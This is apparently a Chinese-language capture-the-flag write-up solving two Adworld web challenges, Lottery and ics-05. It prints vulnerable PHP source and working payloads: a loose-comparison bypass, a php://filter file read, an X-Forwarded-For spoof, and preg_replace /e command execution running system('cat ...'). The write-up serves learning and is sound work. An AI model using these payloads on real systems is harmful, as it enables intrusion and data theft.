双剑破天门:攻防世界Web题解之独孤九剑心法(十)

双剑破天门:攻防世界Web题解之独孤九剑心法(十)

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任


**本文以攻防世界部分题为例进行演示,后续会对攻防世界大部分的web题目进行演示,如果你感兴趣请关注**


目录

一:Lottery

二:ics-05

三:总结


一:Lottery

打开后发现这个靶场加载异常缓慢,然后他还给了源码,我们先不看源码先熟悉一下这个网站是什么

这应该是一个类似猜数字游戏,选对7个号码即可得到相应奖励

然后注册

随便输入7个数字发现一个也没中,白费2元

然后我们随便点击这个网站的功能发现如果想要flag需要有相对应的余额

我们这会的思路就是利用bp抓包看看能不能修改我们的余额

好像成功了,我们试一试能不能换flag

居然说没有足够的钱,这个方法不行只要将页面上的数字修改只要刷新就会变回原来的余额

居然不能修改余额那就看看在猜数字的页面有没有突破口,发现其访问了api.php我们继续代码审计

看到如下核心代码,首先随机生成七位数字(random_win_nums)然后将其赋值给$win_number。随后关键点就是他使用的是两个等号来判断我们传入的数字和随机生成的数字,既然这样那直接可以利用true绕过,因为不检查类型


代码如下

//部分代码 function random_num(){ do { $byte = openssl_random_pseudo_bytes(10, $cstrong); $num = ord($byte); } while ($num >= 250); if(!$cstrong){ response_error('server need be checked, tell admin'); } $num /= 25; return strval(floor($num)); } function random_win_nums(){ $result = ''; for($i=0; $i<7; $i++){ $result .= random_num(); } return $result; } function buy($req){ require_registered(); require_min_money(2); $money = $_SESSION['money']; $numbers = $req['numbers']; $win_numbers = random_win_nums(); $same_count = 0; for($i=0; $i<7; $i++){ if($numbers[$i] == $win_numbers[$i]){ $same_count++; } } switch ($same_count) { case 2: $prize = 5; break; case 3: $prize = 20; break; case 4: $prize = 300; break; case 5: $prize = 1800; break; case 6: $prize = 200000; break; case 7: $prize = 5000000; break; default: $prize = 0; break; } $money += $prize - 2; $_SESSION['money'] = $money; response(['status'=>'ok','numbers'=>$numbers, 'win_numbers'=>$win_numbers, 'money'=>$money, 'prize'=>$prize]); } 

抓到其流量包我们拦截回应包修改

利用php的弱类型比较

直接将numbers字段改为[true,true,true,true,true,true,true]

成功利用弱类型得到奖金

成功拿到flag


二:ics-05

打开如下所示

随便点击发现只有此页面可打开,但是好像什么都没有,我们打开页面源代码查看一下

发现一个href可点

打开如下,好像没什么特别的

我们修改其为index.php回显ok,既然这样那么如果我们能够读取到这个index.php应该就可以拿到flag

读取文件使用伪协议

php://filter/read=convert.base64-encode/resource=index.php

复制这个base64然后解密

打开代码后观察如下代码

如果ip为127.0.0.1就是admin,然后还有一个preg_replace方法,pattern第一个参数的结尾包含了/e修正符的话,第二个参数就会被当做php代码执行

打开bp,修改ip后为admin

然后添加三个参数

?pat=/heihei/e&rep=system('find+-name+*flag*')&sub=heihei

需要使用+置换空格 得到flag.php

成功拿到flag但注意flag不在页面渲染中显示

?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei

解密后的index.php代码

<?php error_reporting(0); @session_start(); posix_setuid(1000); ?> <!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="layui/css/layui.css" media="all"> <title>设备维护中心</title> <meta charset="utf-8"> </head> <body> <ul> <li><a href="?page=index">云平台设备维护中心</a></li> </ul> <fieldset> <legend>设备列表</legend> </fieldset> <table></table> <script type="text/html"> <!-- 这里的 checked 的状态只是演示 --> <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}> </script> <script src="layui/layui.js" charset="utf-8"></script> <script> layui.use('table', function() { var table = layui.table, form = layui.form; table.render({ elem: '#test', url: '/somrthing.json', cellMinWidth: 80, cols: [ [ { type: 'numbers' }, { type: 'checkbox' }, { field: 'id', title: 'ID', width: 100, unresize: true, sort: true }, { field: 'name', title: '设备名', templet: '#nameTpl' }, { field: 'area', title: '区域' }, { field: 'status', title: '维护状态', minWidth: 120, sort: true }, { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true } ] ], page: true }); }); </script> <script> layui.use('element', function() { var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块 //监听导航点击 element.on('nav(demo)', function(elem) { //console.log(elem) layer.msg(elem.text()); }); }); </script> <?php $page = $_GET[page]; if (isset($page)) { if (ctype_alnum($page)) { ?> <br /><br /><br /><br /> <div> <p><?php echo $page; die();?></p> <br /><br /><br /><br /> <?php }else{ ?> <br /><br /><br /><br /> <div> <p> <?php if (strpos($page, 'input') > 0) { die(); } if (strpos($page, 'ta:text') > 0) { die(); } if (strpos($page, 'text') > 0) { die(); } if ($page === 'index.php') { die('Ok'); } include($page); die(); ?> </p> <br /><br /><br /><br /> <?php }} //方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "<br >Welcome My Admin ! <br >"; $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?> </body> </html>

三:总结

本文通过攻防世界中的两个Web题目(Lottery和ics-05)演示了如何利用代码审计和漏洞挖掘技术获取flag。在Lottery题目中,通过分析网站的猜数字游戏功能,发现使用PHP的弱类型比较漏洞,成功绕过验证并获取奖金和flag。在ics-05题目中,通过修改IP地址和利用PHP的preg_replace函数执行系统命令,成功读取并解密index.php文件,最终获取flag。


(需要源代码及各类资料联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

Read more

基于YOLOv8/YOLOv10/YOLOv11/YOLOv12与SpringBoot的小麦叶片病害检测系统(千问+DeepSeek智能分析+web交互界面+前后端分离+YOLO数据)

基于YOLOv8/YOLOv10/YOLOv11/YOLOv12与SpringBoot的小麦叶片病害检测系统(千问+DeepSeek智能分析+web交互界面+前后端分离+YOLO数据)

一、 引言背景 小麦作为全球最重要的粮食作物之一,其生产安全直接关系到国家粮食安全与民生稳定。然而,小麦在其生长周期中极易受到多种病害的侵袭,如白粉病、条锈病、叶锈病、叶枯病等。这些病害若不及时识别与防治,将导致小麦严重减产,甚至绝收。传统的病害诊断主要依赖于农业专家的人工田间巡查,这种方式不仅效率低下、成本高昂,且诊断结果的准确性和时效性高度依赖专家的个人经验,难以在广大的农田区域实现快速、标准化的普及。 近年来,随着深度学习和计算机视觉技术的飞速发展,特别是以YOLO系列为代表的目标检测算法,为农业领域的智能化病害检测提供了革命性的解决方案。YOLO算法以其“你只看一次”的实时检测特性,能够在保证高精度的前提下实现快速的图像目标识别,完美契合了田间快速筛查病害的需求。 与此同时,现代软件工程中前后端分离的架构模式与Web交互技术的成熟,使得将强大的AI模型能力封装成易用、可管理、可扩展的在线服务成为可能。SpringBoot作为Java生态中广受欢迎的后端框架,以其简化的配置和强大的功能,为构建稳健的企业级应用后端提供了坚实基础。 本项目正是在此背景下应运而生。我们设计并

解密微信视频号WebAssembly加密:从逆向到实现的完整指南

解密微信视频号WebAssembly加密:从逆向到实现的完整指南 最近在研究一些视频平台的资源获取方式时,不可避免地遇到了微信视频号。和许多开发者一样,最初的想法是寻找一个现成的工具,比如在GitHub上颇有名气的WeChatVideoDownloader。它的代理思路很巧妙,但很快我就发现,直接下载下来的视频文件打不开了——文件头不对劲,播放器完全不认。这显然不是网络问题,而是视频数据本身被动了手脚。微信给视频号内容加上了一层加密,这对于想要深入研究其技术实现,或者有合法合规的离线分析需求的开发者来说,成了一个必须跨过的门槛。这篇文章,就是记录我如何一步步拆解这层加密外壳,并最终实现完整解密流程的旅程。整个过程涉及对前端JavaScript的调试、对WebAssembly模块的逆向分析,以及对特定随机数生成算法的理解,目标读者是那些对WebAssembly、加密算法和浏览器逆向有浓厚兴趣,并愿意动手实践的技术爱好者。 1. 现象探查与加密特征分析 当你从视频号下载一个视频文件,用十六进制编辑器打开它的头部,第一眼就会发现问题。一个正常的MP4文件,其文件头通常以清晰的ftyp

前端老铁必看:CSS3十六进制透明度搞定UI朦胧美,拒绝设计稿返工

前端老铁必看:CSS3十六进制透明度搞定UI朦胧美,拒绝设计稿返工

前端老铁必看:CSS3十六进制透明度搞定UI朦胧美,拒绝设计稿返工 * 前端老铁必看:CSS3十六进制透明度搞定UI朦胧美,拒绝设计稿返工 * 开篇先唠两句 * 这玩意儿到底是个啥 * 手把手教你玩出花 * 基础操作:8位十六进制拆解 * 进阶玩法:不用backdrop-filter也能唬人的毛玻璃 * 骚操作预警:透明度渐变做动画 * 别光看优点,坑也得踩明白 * 老项目混用rgba()和#RRGGBBAA,维护地狱 * 构建工具压缩CSS时的坑 * 设计师给的色值是6位,你非要加AA * 真实项目里的那些破事 * 电商大促页面:秒杀氛围感拉满 * 后台管理系统:表格行悬停柔和化 * H5活动页:背景图上加文字,清晰度提升秘籍 * 遇到BUG别慌,先查这三点 * 开发者工具显示正常,页面却不对劲 * 移动端安卓机显示异常 * 颜色看起来发灰,AA值算错了 * 私藏的几个野路子技巧 * SCSS变量封装,懒人必备

前端如何调用后端接口(HTML + JS & Vue )

本文将以 Go 语言后端 为例,详细介绍: * Go 后端接口如何设计 * 接口的请求 / 响应结构 * 前端如何用 HTML + JS 调用 Go 接口 * 前端如何用 Vue 工程模式 调用 Go 接口 * 两种方式的区别与适用场景 一、整体架构说明 前后端分离架构 浏览器   |   | HTTP 请求(JSON)   ↓ 前端(HTML / Vue)   |   | HTTP 请求   ↓ Go 后端(API)   |   | JSON 响应   ↓ 前端渲染页面 * 前端:负责 页面 + 交互 * 后端(Go):负责 业务逻辑 + 数据处理 * 通信方式: